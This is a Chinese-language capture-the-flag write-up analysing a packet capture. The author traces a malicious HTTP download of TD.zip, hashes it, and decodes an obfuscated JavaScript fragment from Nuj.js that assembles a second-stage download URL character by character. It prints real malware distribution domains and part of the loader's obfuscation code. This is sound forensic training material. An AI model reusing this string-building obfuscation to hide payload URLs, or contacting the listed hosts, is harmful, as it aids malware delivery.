题目地址:https://xj.edisec.net/challenges/58
1.下载数据包文件 hacker1.pacapng,分析恶意程序访问了内嵌 URL 获取了 zip 压缩包,该 URL 是什么将该 URL作为 FLAG 提交 FLAG(形式:flag{www.baidu.com}) (无需 http、https);
追踪流-http流,发现第三次请求时,返回了200,且返回包是压缩文件
GET /w0ks//?YO=1702920835 HTTP/1.1 Host: tsdandassociates.co.sz Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://tsdandassociates.co.sz/w0ks/?92444881 Accept-Encoding: gzip, deflate Accept-Language: en HTTP/1.1 200 OK Server: nginx Date: Mon, 18 Dec 2023 17:33:59 GMT Content-Type: application/octet-stream Content-Length: 85834 x-powered-by: PHP/7.4.33 content-description: File Transfer content-disposition: attachment; filename=TD.zip content-transfer-encoding: binary expires: 0 cache-control: must-revalidate, post-check=0, pre-check=0 pragma: public x-turbo-charged-by: LiteSpeed PK.........j.WP.E.............yUT ..,F.elE.eux...................d...c:.8%...C-..../v.}&...Be..... ...E.O?Xd.(....7......9.guq...Wb...rTw.4....){...D...3,...l...7`.... ..r{D.........T.,.............u.px..<..Q&.e.
所以看到Referer地址即为flag
flag{tsdandassociates.co.sz/w0ks/?92444881}
2.下载数据包文件 hacker1.pacapng,分析获取到的 zip 压缩包的 MD5 是什么 作为 FLAG 提交 FLAG(形式:flag{md5});
导出对象-http,选择返回成功的请求,即问题1的?YO=1702920835
另存为1.zip
计算md5
C:\Users\admin\Downloads>certutil -hashfile 111.zip MD5 MD5 的 111.zip 哈希: f17dc5b1c30c512137e62993d1df9b2f CertUtil: -hashfile 命令成功完成。 flag{f17dc5b1c30c512137e62993d1df9b2f}
3.下载数据包文件 hacker1.pacapng,分析 zip 压缩包通过加载其中的 javascript 文件到另一个域名下载后续恶意程序, 该域名是什么?提交答案:flag{域名}(无需 http、https)
从流量包中保存的zip文件,解压后发现Nuj.js有字符串拼接的代码
其中一段如下
o457607380 = ''; o457607380+='h'; o457607380+='t'; o457607380+='t'; o457607380+='p'; o457607380+='s'; o457607380+=':'; o457607380+='/'; o457607380+='/'; o457607380+='s'; o457607380+='h'; o457607380+='a'; o457607380+='k'; o457607380+='y'; o457607380+='a'; o457607380+='s'; o457607380+='t'; o457607380+='a'; o457607380+='t'; o457607380+='u'; o457607380+='e'; o457607380+='s'; o457607380+='t'; o457607380+='r'; o457607380+='a'; o457607380+='d'; o457607380+='e'; o457607380+='.'; o457607380+='c'; o457607380+='o'; o457607380+='m'; o457607380+='/'; o457607380+='A'; o457607380+='6'; o457607380+='F'; o457607380+='/'; o457607380+='6'; o457607380+='1'; o457607380+='6'; o457607380+='2'; o457607380+='3'; o457607380+='1'; o457607380+='6'; o457607380+='0'; o457607380+='3'; l988241708 = ''; l988241708+='q'; l988241708+='u'; l988241708+='i'; l988241708+='.'; l988241708+='q'; 即:https://shakyastatuestrade.com/A6F/616231603 推测此为外连地址 flag{shakyastatuestrade.com}
因为对js不熟,第三题仅仅是知其然而不知其所以然,还仍需学习